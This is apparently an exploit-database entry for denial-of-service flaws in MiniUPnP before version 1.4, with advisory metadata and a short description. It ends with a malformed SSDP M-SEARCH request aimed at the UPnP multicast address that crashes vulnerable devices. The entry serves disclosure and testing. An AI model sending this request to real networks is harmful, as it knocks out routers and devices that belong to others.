MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities

2012-01-28T00:00:00
ID EXPLOITPACK:9EF10585C430323830CEDBC328BABCA7
Type exploitpack
Reporter Rapid7
Modified 2012-01-28T00:00:00

Description

MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/57602/info

MiniUPnP is prone to multiple denial-of-service vulnerabilities.

Attackers can exploit these issues to cause denial-of-service conditions.

MiniUPnP versions prior to 1.4 are vulnerable. 

M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:uuid:schemas:device:MX:3< no CRLF >